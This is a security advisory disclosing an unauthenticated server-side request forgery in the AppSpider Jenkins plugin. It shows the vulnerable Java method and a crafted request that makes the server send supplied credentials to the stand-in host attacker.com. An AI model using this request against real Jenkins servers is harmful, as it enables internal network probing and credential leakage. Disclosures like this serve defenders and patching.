GHSL-2023-075: Server-Side Request Forgery (SSRF) in the AppSpider Jenkins plugin - CVE-2023-32998, CVE-2023-32999

Coordinated Disclosure Timeline

• 2023-04-11: Issue reported to the Jenkins Security Team.
• 2023-05-16: Issue is fixed and advisory publish.

Summary

A Server-Side Request Forgery (SSRF) vulnerability was found in the pspider-build-scanner-plugin. The vulnerability resides in the com.rapid7.jenkinspider.PostBuildScan#doTestCredentials method and can be exploited without authentication. An attacker can leverage this vulnerability to send requests to arbitrary hosts.

Product

AppSpider Jenkins plugin

Tested Version

1.0.15

Details

SSRF in com.rapid7.jenkinspider.PostBuildScan#doTestCredentials (GHSL-2023-075)

The doTestCredentials method in the PostBuildScan.java file lacks proper validation and sanitization of user input for the appSpiderEntUrl parameter, allowing a blind exploitation of a server-side request forgery (SSRF).

Affected source code: PostBuildScan.java

        public FormValidation doTestCredentials(@QueryParameter("appSpiderAllowSelfSignedCertificate") final boolean allowSelfSignedCertificate, @QueryParameter("appSpiderEntUrl") final String appSpiderEntUrl,
@QueryParameter("appSpiderUsername") final String username, @QueryParameter("appSpiderPassword") final Secret password) {
    return executeRequest(appSpiderEntUrl, allowSelfSignedCertificate, client -> {
                try {
                    if (!client.testAuthentication(new AuthenticationModel(username, Secret.toString(password)))) {
                        return FormValidation.error(INVALID_CREDENTIALS);
                    } else {
                        return FormValidation.ok("Connected Successfully.");
                    }

                } catch (IllegalArgumentException e) {
                    return FormValidation.error(INVALID_CREDENTIALS);
                }
            }, FormValidation.error(INVALID_CREDENTIALS));
        }

In order to exploit the vulnerability, an attacker may send the following crafted request:

GET /jenkins/descriptorByName/com.rapid7.jenkinspider.PostBuildScan/testCredentials?appSpiderEntUrl=http:%2f%2fattacker.com%23&appSpiderUsername=foo&appSpiderPassword=bar HTTP/1.1
Host: localhost:8080
Connection: close

The forged request:

POST / HTTP/1.1
Content-Type: application/json
Content-Length: 31
Host: attacker.com
Connection: Keep-Alive
User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.16.1)
Accept-Encoding: gzip,deflate

{"password":"bar","name":"foo"}

This vulnerability was found using CodeQL’s SSRF Java query.

Impact

This issue may lead to server-side request forgery.

CVE

• CVE-2023-32998 (CSRF)
• CVE-2023-32999 (missing permission check)

Resources

• SECURITY-3121

Credit

This issue was discovered and reported by GHSL team member @pwntester (Alvaro Muñoz).

Contact

You can contact the GHSL team at securitylab@github.com, please include a reference to GHSL-2023-075 in any communication regarding this issue.